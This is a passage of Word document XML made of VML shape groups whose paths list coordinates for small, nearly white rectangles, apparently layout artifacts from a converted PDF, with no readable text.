5208,14431,5211,14431,5214,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14432,5217,14432,5217,14432,5217,14432,5217,14432,5217,14432,5217,14432,5217,14432,5217,14432,5217,14433,5217,14433,5217,14433,5217,14433,5217,14434,5217,14434,5217,14434,5217,14435,5217,14435,5217,14435,5217,14436,5217,14436,5217,14437,5217,14437,5217,14438,5217,14438,5217,14439,5217,14440,5217,14440,5217,14441,5217,14442,5217,14442,5217,14443,5217,14444,5217,14445,5217,14446,5217,14447,5217,14448,5217,14449,5217,14450,5217,14451,5217,14453,5217,14454,5217,14455,5217,14456,5217,14458,5217,14459,5217,14461,5217,14462,5217,14464,5217,14466,5217,14467,5217,14469,5217,14471,5217,14473,5217,14475,5217,14477,5217,14479,5217,14481,5217,14483,5217,14485,5217,14488,5217,14490,5217,14493,5217,14495,5217,14498,5217,14500,5217,14503,5217,14506,5217,14509,5217,14512,5217,14515,5217,14518,5217,14521,5217,14524,5217,14528,5217,14531,5217,14534,5217,14538,5217,14542,5217,14545,5217,14549,5217,14553,5217,14557,5217,14561,5217,14565,5217,14569,5217,14574,5217,14578,5217,14583,5217,14587,5217,14592,5217,14597,5217,14602,5217,14607,5217,14612,5217,14617,5217,14622,5217,14627,5217,14633,5217,14638,5217,14644,5217,14650,5217,14656,5217,14662,5217,14668,5217,14674,5217,14680,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5216,14686,5216,14686,5216,14686,5216,14686,5216,14686,5216,14686,5216,14686,5216,14686,5216,14686,5216,14686,5216,14686,5216,14686,5216,14686,5215,14686,5215,14686,5215,14686,5215,14686,5215,14686,5215,14686,5214,14686,5214,14686,5214,14686,5214,14686,5213,14686,5213,14686,5213,14686,5212,14686,5212,14686,5212,14686,5211,14686,5211,14686,5211,14686,5210,14686,5210,14686,5209,14686,5209,14686,5208,14686,5208,14686,5207,14686,5207,14686,5206,14686,5205,14686,5205,14686,5204,14686,5203,14686,5203,14686,5202,14686,5201,14686,5200,14686,5200,14686,5199,14686,5198,14686,5197,14686,5196,14686,5195,14686,5194,14686,5193,14686,5192,14686,5191,14686,5190,14686,5189,14686,5188,14686,5187,14686,5185,14686,5184,14686,5183,14686,5182,14686,5180,14686,5179,14686,5177,14686,5176,14686,5174,14686,5173,14686,5171,14686,5170,14686,5168,14686,5166,14686,5165,14686,5163,14686,5161,14686,5159,14686,5157,14686,5156,14686,5154,14686,5152,14686,5150,14686,5147,14686,5145,14686,5143,14686,5141,14686,5139,14686,5136,14686,5134,14686,5132,14686,5129,14686,5127,14686,5124,14686,5122,14686,5119,14686,5117,14686,5114,14686,5111,14686,5108,14686,5105,14686,5103,14686,5100,14686,5097,14686,5097,14686,5097,14686,5097,14686,5097,14686,5097,14686,5097,14686,5097,14686,5097,14686,5097,14686,5097,14686,5097,14686,5097,14686,5097,14686,5097,14686,5097,14686,5097,14686,5097,14686,5097,14686,5097,14686,5097,14685,5097,14685,5097,14685,5097,14685,5097,14685,5097,14684,5097,14684,5097,14684,5097,14683,5097,14683,5097,14683,5097,14682,5097,14682,5097,14681,5097,14681,5097,14680,5097,14680,5097,14679,5097,14679,5097,14678,5097,14677,5097,14677,5097,14676,5097,14675,5097,14674,5097,14674,5097,14673,5097,14672,5097,14671,5097,14670,5097,14669,5097,14667,5097,14666,5097,14665,5097,14664,5097,14663,5097,14661,5097,14660,5097,14658,5097,14657,5097,14655,5097,14654,5097,14652,5097,14650,5097,14649,5097,14647,5097,14645,5097,14643,5097,14641,5097,14639,5097,14637,5097,14634,5097,14632,5097,14630,5097,14628,5097,14625,5097,14623,5097,14620,5097,14617,5097,14615,5097,14612,5097,14609,5097,14606,5097,14603,5097,14600,5097,14597,5097,14593,5097,14590,5097,14587,5097,14583,5097,14580,5097,14576,5097,14572,5097,14569,5097,14565,5097,14561,5097,14557,5097,14552,5097,14548,5097,14544,5097,14540,5097,14535,5097,14530,5097,14526,5097,14521,5097,14516,5097,14511,5097,14506,5097,14501,5097,14496,5097,14490,5097,14485,5097,14479,5097,14474,5097,14468,5097,14462,5097,14456,5097,14450,5097,14444,5097,14438,5097,14431e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:258.874pt;margin-top:719.874pt;width:7.125pt;height:14.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5177,14397" coordsize="142,282">
        <v:shape style="position:absolute;left:5177;top:14397;width:142;height:282" coordorigin="5177,14397" coordsize="142,282" path="m5217,14431l5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5217,14431,5218,14431,5218,14431,5218,14431,5218,14431,5218,14431,5218,14431,5219,14431,5219,14431,5219,14431,5219,14431,5219,14431,5220,14431,5220,14431,5220,14431,5221,14431,5221,14431,5221,14431,5222,14431,5222,14431,5222,14431,5223,14431,5223,14431,5224,14431,5224,14431,5225,14431,5225,14431,5226,14431,5226,14431,5227,14431,5227,14431,5228,14431,5228,14431,5229,14431,5230,14431,5231,14431,5231,14431,5232,14431,5233,14431,5234,14431,5234,14431,5235,14431,5236,14431,5237,14431,5238,14431,5239,14431,5240,14431,5241,14431,5242,14431,5243,14431,5244,14431,5245,14431,5247,14431,5248,14431,5249,14431,5250,14431,5252,14431,5253,14431,5254,14431,5256,14431,5257,14431,5259,14431,5260,14431,5262,14431,5264,14431,5265,14431,5267,14431,5269,14431,5270,14431,5272,14431,5274,14431,5276,14431,5278,14431,5280,14431,5282,14431,5284,14431,5286,14431,5288,14431,5290,14431,5292,14431,5294,14431,5297,14431,5299,14431,5301,14431,5304,14431,5306,14431,5309,14431,5311,14431,5314,14431,5317,14431,5319,14431,5322,14431,5325,14431,5328,14431,5331,14431,5334,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14432,5337,14432,5337,14432,5337,14432,5337,14432,5337,14432,5337,14432,5337,14432,5337,14432,5337,14433,5337,14433,5337,14433,5337,14433,5337,14434,5337,14434,5337,14434,5337,14435,5337,14435,5337,14435,5337,14436,5337,14436,5337,14437,5337,14437,5337,14438,5337,14438,5337,14439,5337,14440,5337,14440,5337,14441,5337,14442,5337,14442,5337,14443,5337,14444,5337,14445,5337,14446,5337,14447,5337,14448,5337,14449,5337,14450,5337,14451,5337,14453,5337,14454,5337,14455,5337,14456,5337,14458,5337,14459,5337,14461,5337,14462,5337,14464,5337,14466,5337,14467,5337,14469,5337,14471,5337,14473,5337,14475,5337,14477,5337,14479,5337,14481,5337,14483,5337,14485,5337,14488,5337,14490,5337,14493,5337,14495,5337,14498,5337,14500,5337,14503,5337,14506,5337,14509,5337,14512,5337,14515,5337,14518,5337,14521,5337,14524,5337,14528,5337,14531,5337,14534,5337,14538,5337,14542,5337,14545,5337,14549,5337,14553,5337,14557,5337,14561,5337,14565,5337,14569,5337,14574,5337,14578,5337,14583,5337,14587,5337,14592,5337,14597,5337,14602,5337,14607,5337,14612,5337,14617,5337,14622,5337,14627,5337,14633,5337,14638,5337,14644,5337,14650,5337,14656,5337,14662,5337,14668,5337,14674,5337,14680,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5336,14686,5336,14686,5336,14686,5336,14686,5336,14686,5336,14686,5336,14686,5336,14686,5336,14686,5336,14686,5336,14686,5336,14686,5335,14686,5335,14686,5335,14686,5335,14686,5335,14686,5335,14686,5334,14686,5334,14686,5334,14686,5334,14686,5333,14686,5333,14686,5333,14686,5332,14686,5332,14686,5332,14686,5331,14686,5331,14686,5331,14686,5330,14686,5330,14686,5329,14686,5329,14686,5328,14686,5328,14686,5327,14686,5327,14686,5326,14686,5325,14686,5325,14686,5324,14686,5323,14686,5323,14686,5322,14686,5321,14686,5321,14686,5320,14686,5319,14686,5318,14686,5317,14686,5316,14686,5315,14686,5314,14686,5313,14686,5312,14686,5311,14686,5310,14686,5309,14686,5308,14686,5307,14686,5305,14686,5304,14686,5303,14686,5302,14686,5300,14686,5299,14686,5297,14686,5296,14686,5294,14686,5293,14686,5291,14686,5290,14686,5288,14686,5286,14686,5285,14686,5283,14686,5281,14686,5279,14686,5278,14686,5276,14686,5274,14686,5272,14686,5270,14686,5268,14686,5265,14686,5263,14686,5261,14686,5259,14686,5257,14686,5254,14686,5252,14686,5249,14686,5247,14686,5244,14686,5242,14686,5239,14686,5237,14686,5234,14686,5231,14686,5228,14686,5225,14686,5223,14686,5220,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14686,5217,14685,5217,14685,5217,14685,5217,14685,5217,14685,5217,14684,5217,14684,5217,14684,5217,14683,5217,14683,5217,14683,5217,14682,5217,14682,5217,14681,5217,14681,5217,14680,5217,14680,5217,14679,5217,14679,5217,14678,5217,14677,5217,14677,5217,14676,5217,14675,5217,14674,5217,14674,5217,14673,5217,14672,5217,14671,5217,14670,5217,14669,5217,14667,5217,14666,5217,14665,5217,14664,5217,14663,5217,14661,5217,14660,5217,14658,5217,14657,5217,14655,5217,14654,5217,14652,5217,14650,5217,14649,5217,14647,5217,14645,5217,14643,5217,14641,5217,14639,5217,14637,5217,14634,5217,14632,5217,14630,5217,14628,5217,14625,5217,14623,5217,14620,5217,14617,5217,14615,5217,14612,5217,14609,5217,14606,5217,14603,5217,14600,5217,14597,5217,14593,5217,14590,5217,14587,5217,14583,5217,14580,5217,14576,5217,14572,5217,14569,5217,14565,5217,14561,5217,14557,5217,14552,5217,14548,5217,14544,5217,14540,5217,14535,5217,14530,5217,14526,5217,14521,5217,14516,5217,14511,5217,14506,5217,14501,5217,14496,5217,14490,5217,14485,5217,14479,5217,14474,5217,14468,5217,14462,5217,14456,5217,14450,5217,14444,5217,14438,5217,14431e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:264.874pt;margin-top:719.874pt;width:7.125pt;height:14.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5297,14397" coordsize="142,282">
        <v:shape style="position:absolute;left:5297;top:14397;width:142;height:282" coordorigin="5297,14397" coordsize="142,282" path="m5337,14431l5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5337,14431,5338,14431,5338,14431,5338,14431,5338,14431,5338,14431,5338,14431,5338,14431,5339,14431,5339,14431,5339,14431,5339,14431,5339,14431,5340,14431,5340,14431,5340,14431,5341,14431,5341,14431,5341,14431,5342,14431,5342,14431,5342,14431,5343,14431,5343,14431,5344,14431,5344,14431,5345,14431,5345,14431,5346,14431,5346,14431,5347,14431,5347,14431,5348,14431,5349,14431,5349,14431,5350,14431,5351,14431,5351,14431,5352,14431,5353,14431,5354,14431,5355,14431,5355,14431,5356,14431,5357,14431,5358,14431,5359,14431,5360,14431,5361,14431,5362,14431,5363,14431,5364,14431,5366,14431,5367,14431,5368,14431,5369,14431,5370,14431,5372,14431,5373,14431,5375,14431,5376,14431,5377,14431,5379,14431,5380,14431,5382,14431,5384,14431,5385,14431,5387,14431,5389,14431,5390,14431,5392,14431,5394,14431,5396,14431,5398,14431,5400,14431,5402,14431,5404,14431,5406,14431,5408,14431,5410,14431,5412,14431,5415,14431,5417,14431,5419,14431,5422,14431,5424,14431,5426,14431,5429,14431,5432,14431,5434,14431,5437,14431,5439,14431,5442,14431,5445,14431,5448,14431,5451,14431,5454,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14432,5457,14432,5457,14432,5457,14432,5457,14432,5457,14432,5457,14432,5457,14432,5457,14432,5457,14433,5457,14433,5457,14433,5457,14433,5457,14434,5457,14434,5457,14434,5457,14435,5457,14435,5457,14435,5457,14436,5457,14436,5457,14437,5457,14437,5457,14438,5457,14438,5457,14439,5457,14440,5457,14440,5457,14441,5457,14442,5457,14442,5457,14443,5457,14444,5457,14445,5457,14446,5457,14447,5457,14448,5457,14449,5457,14450,5457,14451,5457,14453,5457,14454,5457,14455,5457,14456,5457,14458,5457,14459,5457,14461,5457,14462,5457,14464,5457,14466,5457,14467,5457,14469,5457,14471,5457,14473,5457,14475,5457,14477,5457,14479,5457,14481,5457,14483,5457,14485,5457,14488,5457,14490,5457,14493,5457,14495,5457,14498,5457,14500,5457,14503,5457,14506,5457,14509,5457,14512,5457,14515,5457,14518,5457,14521,5457,14524,5457,14528,5457,14531,5457,14534,5457,14538,5457,14542,5457,14545,5457,14549,5457,14553,5457,14557,5457,14561,5457,14565,5457,14569,5457,14574,5457,14578,5457,14583,5457,14587,5457,14592,5457,14597,5457,14602,5457,14607,5457,14612,5457,14617,5457,14622,5457,14627,5457,14633,5457,14638,5457,14644,5457,14650,5457,14656,5457,14662,5457,14668,5457,14674,5457,14680,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5456,14686,5456,14686,5456,14686,5456,14686,5456,14686,5456,14686,5456,14686,5456,14686,5456,14686,5456,14686,5455,14686,5455,14686,5455,14686,5455,14686,5455,14686,5455,14686,5454,14686,5454,14686,5454,14686,5454,14686,5453,14686,5453,14686,5453,14686,5453,14686,5452,14686,5452,14686,5451,14686,5451,14686,5451,14686,5450,14686,5450,14686,5449,14686,5449,14686,5448,14686,5448,14686,5447,14686,5447,14686,5446,14686,5446,14686,5445,14686,5444,14686,5444,14686,5443,14686,5442,14686,5441,14686,5441,14686,5440,14686,5439,14686,5438,14686,5437,14686,5436,14686,5435,14686,5434,14686,5433,14686,5432,14686,5431,14686,5430,14686,5429,14686,5428,14686,5427,14686,5425,14686,5424,14686,5423,14686,5422,14686,5420,14686,5419,14686,5417,14686,5416,14686,5415,14686,5413,14686,5411,14686,5410,14686,5408,14686,5407,14686,5405,14686,5403,14686,5401,14686,5399,14686,5398,14686,5396,14686,5394,14686,5392,14686,5390,14686,5388,14686,5386,14686,5383,14686,5381,14686,5379,14686,5377,14686,5374,14686,5372,14686,5369,14686,5367,14686,5364,14686,5362,14686,5359,14686,5357,14686,5354,14686,5351,14686,5348,14686,5346,14686,5343,14686,5340,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14686,5337,14685,5337,14685,5337,14685,5337,14685,5337,14685,5337,14684,5337,14684,5337,14684,5337,14683,5337,14683,5337,14683,5337,14682,5337,14682,5337,14681,5337,14681,5337,14680,5337,14680,5337,14679,5337,14679,5337,14678,5337,14677,5337,14677,5337,14676,5337,14675,5337,14674,5337,14674,5337,14673,5337,14672,5337,14671,5337,14670,5337,14669,5337,14667,5337,14666,5337,14665,5337,14664,5337,14663,5337,14661,5337,14660,5337,14658,5337,14657,5337,14655,5337,14654,5337,14652,5337,14650,5337,14649,5337,14647,5337,14645,5337,14643,5337,14641,5337,14639,5337,14637,5337,14634,5337,14632,5337,14630,5337,14628,5337,14625,5337,14623,5337,14620,5337,14617,5337,14615,5337,14612,5337,14609,5337,14606,5337,14603,5337,14600,5337,14597,5337,14593,5337,14590,5337,14587,5337,14583,5337,14580,5337,14576,5337,14572,5337,14569,5337,14565,5337,14561,5337,14557,5337,14552,5337,14548,5337,14544,5337,14540,5337,14535,5337,14530,5337,14526,5337,14521,5337,14516,5337,14511,5337,14506,5337,14501,5337,14496,5337,14490,5337,14485,5337,14479,5337,14474,5337,14468,5337,14462,5337,14456,5337,14450,5337,14444,5337,14438,5337,14431e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:270.874pt;margin-top:719.874pt;width:7.125pt;height:14.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5417,14397" coordsize="142,282">
        <v:shape style="position:absolute;left:5417;top:14397;width:142;height:282" coordorigin="5417,14397" coordsize="142,282" path="m5457,14431l5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5457,14431,5458,14431,5458,14431,5458,14431,5458,14431,5458,14431,5458,14431,5458,14431,5458,14431,5459,14431,5459,14431,5459,14431,5459,14431,5460,14431,5460,14431,5460,14431,5460,14431,5461,14431,5461,14431,5461,14431,5462,14431,5462,14431,5462,14431,5463,14431,5463,14431,5464,14431,5464,14431,5465,14431,5465,14431,5466,14431,5466,14431,5467,14431,5467,14431,5468,14431,5469,14431,5469,14431,5470,14431,5471,14431,5471,14431,5472,14431,5473,14431,5474,14431,5475,14431,5475,14431,5476,14431,5477,14431,5478,14431,5479,14431,5480,14431,5481,14431,5482,14431,5483,14431,5484,14431,5486,14431,5487,14431,5488,14431,5489,14431,5491,14431,5492,14431,5493,14431,5495,14431,5496,14431,5497,14431,5499,14431,5501,14431,5502,14431,5504,14431,5505,14431,5507,14431,5509,14431,5510,14431,5512,14431,5514,14431,5516,14431,5518,14431,5520,14431,5522,14431,5524,14431,5526,14431,5528,14431,5530,14431,5532,14431,5535,14431,5537,14431,5539,14431,5542,14431,5544,14431,5546,14431,5549,14431,5552,14431,5554,14431,5557,14431,5560,14431,5562,14431,5565,14431,5568,14431,5571,14431,5574,14431,5577,14431,5577,14431,5577,14431,5577,14431,5577,14431,5577,14431,5577,14431,5577,14431,5577,14431,5577,14431,5577,14431,5577,14431,5577,14431,5577,14432,5577,14432,5577,14432,5577,14432,5577,14432,5577,14432,5577,14432,5577,14432,5577,14432,5577,14433,5577,14433,5577,14433,5577,14433,5577,14434,5577,14434,5577,14434,5577,14435,5577,14435,5577,14435,5577,14436,5577,14436,5577,14437,5577,14437,5577,14438,5577,14438,5577,14439,5577,14440,5577,14440,5577,14441,5577,14442,5577,14442,5577,14443,5577,14444,5577,14445,5577,14446,5577,14447,5577,14448,5577,14449,5577,14450,5577,14451,5577,14453,5577,14454,5577,14455,5577,14456,5577,14458,5577,14459,5577,14461,5577,14462,5577,14464,5577,14466,5577,14467,5577,14469,5577,14471,5577,14473,5577,14475,5577,14477,5577,14479,5577,14481,5577,14483,5577,14485,5577,14488,5577,14490,5577,14493,5577,14495,5577,14498,5577,14500,5577,14503,5577,14506,5577,14509,5577,14512,5577,14515,5577,14518,5577,14521,5577,14524,5577,14528,5577,14531,5577,14534,5577,14538,5577,14542,5577,14545,5577,14549,5577,14553,5577,14557,5577,14561,5577,14565,5577,14569,5577,14574,5577,14578,5577,14583,5577,14587,5577,14592,5577,14597,5577,14602,5577,14607,5577,14612,5577,14617,5577,14622,5577,14627,5577,14633,5577,14638,5577,14644,5577,14650,5577,14656,5577,14662,5577,14668,5577,14674,5577,14680,5577,14686,5577,14686,5577,14686,5577,14686,5577,14686,5577,14686,5577,14686,5577,14686,5577,14686,5577,14686,5577,14686,5577,14686,5577,14686,5577,14686,5577,14686,5577,14686,5577,14686,5577,14686,5576,14686,5576,14686,5576,14686,5576,14686,5576,14686,5576,14686,5576,14686,5576,14686,5576,14686,5576,14686,5575,14686,5575,14686,5575,14686,5575,14686,5575,14686,5574,14686,5574,14686,5574,14686,5574,14686,5573,14686,5573,14686,5573,14686,5573,14686,5572,14686,5572,14686,5572,14686,5571,14686,5571,14686,5570,14686,5570,14686,5569,14686,5569,14686,5568,14686,5568,14686,5567,14686,5567,14686,5566,14686,5566,14686,5565,14686,5564,14686,5564,14686,5563,14686,5562,14686,5561,14686,5561,14686,5560,14686,5559,14686,5558,14686,5557,14686,5556,14686,5555,14686,5554,14686,5553,14686,5552,14686,5551,14686,5550,14686,5549,14686,5548,14686,5547,14686,5546,14686,5544,14686,5543,14686,5542,14686,5540,14686,5539,14686,5538,14686,5536,14686,5535,14686,5533,14686,5531,14686,5530,14686,5528,14686,5527,14686,5525,14686,5523,14686,5521,14686,5520,14686,5518,14686,5516,14686,5514,14686,5512,14686,5510,14686,5508,14686,5506,14686,5503,14686,5501,14686,5499,14686,5497,14686,5494,14686,5492,14686,5490,14686,5487,14686,5485,14686,5482,14686,5479,14686,5477,14686,5474,14686,5471,14686,5468,14686,5466,14686,5463,14686,5460,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14686,5457,14685,5457,14685,5457,14685,5457,14685,5457,14685,5457,14684,5457,14684,5457,14684,5457,14683,5457,14683,5457,14683,5457,14682,5457,14682,5457,14681,5457,14681,5457,14680,5457,14680,5457,14679,5457,14679,5457,14678,5457,14677,5457,14677,5457,14676,5457,14675,5457,14674,5457,14674,5457,14673,5457,14672,5457,14671,5457,14670,5457,14669,5457,14667,5457,14666,5457,14665,5457,14664,5457,14663,5457,14661,5457,14660,5457,14658,5457,14657,5457,14655,5457,14654,5457,14652,5457,14650,5457,14649,5457,14647,5457,14645,5457,14643,5457,14641,5457,14639,5457,14637,5457,14634,5457,14632,5457,14630,5457,14628,5457,14625,5457,14623,5457,14620,5457,14617,5457,14615,5457,14612,5457,14609,5457,14606,5457,14603,5457,14600,5457,14597,5457,14593,5457,14590,5457,14587,5457,14583,5457,14580,5457,14576,5457,14572,5457,14569,5457,14565,5457,14561,5457,14557,5457,14552,5457,14548,5457,14544,5457,14540,5457,14535,5457,14530,5457,14526,5457,14521,5457,14516,5457,14511,5457,14506,5457,14501,5457,14496,5457,14490,5457,14485,5457,14479,5457,14474,5457,14468,5457,14462,5457,14456,5457,14450,5457,14444,5457,14438,5457,14431e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:282.874pt;margin-top:719.874pt;width:7.125pt;height:14.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5657,14397" coordsize="142,282">
        <v:shape style="position:absolute;left:5657;top:14397;width:142;height:282" coordorigin="5657,14397" coordsize="142,282" path="m5697,14431l5697,14431,5697,14431,5697,14431,5697,14431,5697,14431,5697,14431,5697,14431,5697,14431,5697,14431,5697,14431,5697,14431,5697,14431,5697,14431,5697,14431,5697,14431,5697,14431,5697,14431,5697,14431,5697,14431,5697,14431,5697,14431,5698,14431,5698,14431,5698,14431,5698,14431,5698,14431,5698,14431,5698,14431,5698,14431,5699,14431,5699,14431,5699,14431,5699,14431,5699,14431,5700,14431,5700,14431,5700,14431,5700,14431,5701,14431,5701,14431,5701,14431,5702,14431,5702,14431,5703,14431,5703,14431,5703,14431,5704,14431,5704,14431,5705,14431,5705,14431,5706,14431,5706,14431,5707,14431,5707,14431,5708,14431,5709,14431,5709,14431,5710,14431,5711,14431,5712,14431,5712,14431,5713,14431,5714,14431,5715,14431,5716,14431,5716,14431,5717,14431,5718,14431,5719,14431,5720,14431,5721,14431,5722,14431,5723,14431,5725,14431,5726,14431,5727,14431,5728,14431,5729,14431,5731,14431,5732,14431,5733,14431,5735,14431,5736,14431,5738,14431,5739,14431,5741,14431,5742,14431,5744,14431,5745,14431,5747,14431,5749,14431,5751,14431,5752,14431,5754,14431,5756,14431,5758,14431,5760,14431,5762,14431,5764,14431,5766,14431,5768,14431,5770,14431,5772,14431,5775,14431,5777,14431,5779,14431,5782,14431,5784,14431,5787,14431,5789,14431,5792,14431,5794,14431,5797,14431,5800,14431,5802,14431,5805,14431,5808,14431,5811,14431,5814,14431,5817,14431,5817,14431,5817,14431,5817,14431,5817,14431,5817,14431,5817,14431,5817,14431,5817,14431,5817,14431,5817,14431,5817,14431,5817,14431,5817,14432,5817,14432,5817,14432,5817,14432,5817,14432,5817,14432,5817,14432,5817,14432,5817,14432,5817,14433,5817,14433,5817,14433,5817,14433,5817,14434,5817,14434,5817,14434,5817,14435,5817,14435,5817,14435,5817,14436,5817,14436,5817,14437,5817,14437,5817,14438,5817,14438,5817,14439,5817,14440,5817,14440,5817,14441,5817,14442,5817,14442,5817,14443,5817,14444,5817,14445,5817,14446,5817,14447,5817,14448,5817,14449,5817,14450,5817,14451,5817,14453,5817,14454,5817,14455,5817,14456,5817,14458,5817,14459,5817,14461,5817,14462,5817,14464,5817,14466,5817,14467,5817,14469,5817,14471,5817,14473,5817,14475,5817,14477,5817,14479,5817,14481,5817,14483,5817,14485,5817,14488,5817,14490,5817,14493,5817,14495,5817,14498,5817,14500,5817,14503,5817,14506,5817,14509,5817,14512,5817,14515,5817,14518,5817,14521,5817,14524,5817,14528,5817,14531,5817,14534,5817,14538,5817,14542,5817,14545,5817,14549,5817,14553,5817,14557,5817,14561,5817,14565,5817,14569,5817,14574,5817,14578,5817,14583,5817,14587,5817,14592,5817,14597,5817,14602,5817,14607,5817,14612,5817,14617,5817,14622,5817,14627,5817,14633,5817,14638,5817,14644,5817,14650,5817,14656,5817,14662,5817,14668,5817,14674,5817,14680,5817,14686,5817,14686,5817,14686,5817,14686,5817,14686,5817,14686,5817,14686,5817,14686,5817,14686,5817,14686,5817,14686,5817,14686,5817,14686,5817,14686,5817,14686,5817,14686,5817,14686,5817,14686,5817,14686,5817,14686,5816,14686,5816,14686,5816,14686,5816,14686,5816,14686,5816,14686,5816,14686,5816,14686,5816,14686,5815,14686,5815,14686,5815,14686,5815,14686,5815,14686,5814,14686,5814,14686,5814,14686,5814,14686,5813,14686,5813,14686,5813,14686,5812,14686,5812,14686,5812,14686,5811,14686,5811,14686,5810,14686,5810,14686,5810,14686,5809,14686,5809,14686,5808,14686,5807,14686,5807,14686,5806,14686,5806,14686,5805,14686,5804,14686,5804,14686,5803,14686,5802,14686,5802,14686,5801,14686,5800,14686,5799,14686,5798,14686,5797,14686,5796,14686,5796,14686,5795,14686,5794,14686,5792,14686,5791,14686,5790,14686,5789,14686,5788,14686,5787,14686,5786,14686,5784,14686,5783,14686,5782,14686,5780,14686,5779,14686,5778,14686,5776,14686,5775,14686,5773,14686,5772,14686,5770,14686,5768,14686,5767,14686,5765,14686,5763,14686,5761,14686,5760,14686,5758,14686,5756,14686,5754,14686,5752,14686,5750,14686,5748,14686,5746,14686,5744,14686,5741,14686,5739,14686,5737,14686,5734,14686,5732,14686,5730,14686,5727,14686,5725,14686,5722,14686,5719,14686,5717,14686,5714,14686,5711,14686,5709,14686,5706,14686,5703,14686,5700,14686,5697,14686,5697,14686,5697,14686,5697,14686,5697,14686,5697,14686,5697,14686,5697,14686,5697,14686,5697,14686,5697,14686,5697,14686,5697,14686,5697,14686,5697,14686,5697,14686,5697,14686,5697,14686,5697,14686,5697,14686,5697,14685,5697,14685,5697,14685,5697,14685,5697,14685,5697,14684,5697,14684,5697,14684,5697,14683,5697,14683,5697,14683,5697,14682,5697,14682,5697,14681,5697,14681,5697,14680,5697,14680,5697,14679,5697,14679,5697,14678,5697,14677,5697,14677,5697,14676,5697,14675,5697,14674,5697,14674,5697,14673,5697,14672,5697,14671,5697,14670,5697,14669,5697,14667,5697,14666,5697,14665,5697,14664,5697,14663,5697,14661,5697,14660,5697,14658,5697,14657,5697,14655,5697,14654,5697,14652,5697,14650,5697,14649,5697,14647,5697,14645,5697,14643,5697,14641,5697,14639,5697,14637,5697,14634,5697,14632,5697,14630,5697,14628,5697,14625,5697,14623,5697,14620,5697,14617,5697,14615,5697,14612,5697,14609,5697,14606,5697,14603,5697,14600,5697,14597,5697,14593,5697,14590,5697,14587,5697,14583,5697,14580,5697,14576,5697,14572,5697,14569,5697,14565,5697,14561,5697,14557,5697,14552,5697,14548,5697,14544,5697,14540,5697,14535,5697,14530,5697,14526,5697,14521,5697,14516,5697,14511,5697,14506,5697,14501,5697,14496,5697,14490,5697,14485,5697,14479,5697,14474,5697,14468,5697,14462,5697,14456,5697,14450,5697,14444,5697,14438,5697,14431e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:288.874pt;margin-top:719.874pt;width:7.125pt;height:14.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5777,14397" coordsize="142,282">
